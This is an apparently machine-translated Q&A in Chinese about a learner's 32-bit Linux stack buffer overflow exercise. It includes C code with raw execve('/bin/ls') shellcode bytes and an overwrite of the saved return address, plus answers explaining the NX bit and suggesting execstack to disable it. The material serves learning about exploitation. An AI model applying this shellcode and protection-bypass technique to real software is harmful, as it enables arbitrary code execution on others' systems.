導致緩沖區溢出，段錯誤

Question

我試圖在以下非常簡單的程序中導致緩沖區溢出：

#include <stdio.h>
#include <stdint.h>

void badf(int n, char c, char* buffer)
{

    char mycode[] = {
0xeb, 0x0f, 0xb8, 0x0b,
0x00, 0x00, 0x00, 0x8b,
0x1c, 0x24, 0x8d, 0x0c,
0x24, 0x31, 0xd2, 0xcd,
0x80, 0xe8, 0xec, 0xff, 
0xff, 0xff, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x6c, 
0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00
}; // 37 bytes

// Overwrite Base Pointer
    //mycode[37] = 0x29;
//mycode[38] = 0xf4;
//mycode[39] = 0xff;
//mycode[40] = 0xbf;

    // Overwrite Instruction Pointer
    // Using debugger, found mycode[] to be loaded in: 0xbffff42d
    mycode[41] = 0x2d;
    mycode[42] = 0xf4;
    mycode[43] = 0xff;
    mycode[44] = 0xbf;

}

void f(int n, char c)
{
    char buffer[37];    
    badf(n,c,buffer);
}

void test()
{
    printf("test");
}

int main()
{
    f(37,0x00);
    return 0;
}

（我已成功設法從緩沖區溢出執行test()之前）現在我正在嘗試通過在堆棧中使用mycode的開頭覆蓋指令指針來執行mycode []。

這只有一半工作，程序跳轉到正確的地址，我可以在調試器中看到正確的機器代碼，但隨后崩潰時出現分段錯誤，而不是執行以下指令（參見屏幕截圖）。

我試圖弄清楚為什么他在執行“注入”代碼的內容之前崩潰了。 我對這類東西比較新，我理解分段錯誤意味着我試圖訪問操作系統不希望我的內存？

（PS：32位Linux機器，用-fno-stack-protector編譯，所以我可以玩這個東西）

（如果需要更多信息，我很樂意更新帖子）

Answer 1

可悲的是，這種令人興奮的技巧現在不再適用了。 怪病毒的人。

數據段用NX（無執行）位標記 - 這是觸發段錯誤的原因。 CPU將PC視為無執行區域。

為什么不嘗試覆蓋“真實”函數指針的代碼（獲取現有函數的地址）並查看會發生什么（這可能會失敗，因為編譯器/鏈接器/操作系統也不贊同自修改代碼，也是由於上述病毒人）

Answer 2

如果它是Linux，您可以通過下載和安裝execstack來使其工作，並按照此處的說明進行操作。 分段錯誤可能是你的elf二進制文件默認設置nx位的結果，exxstack選擇性地撤消。 如果這不起作用，您可能會觸發其他保護，您可能會或可能無法禁用這些保護。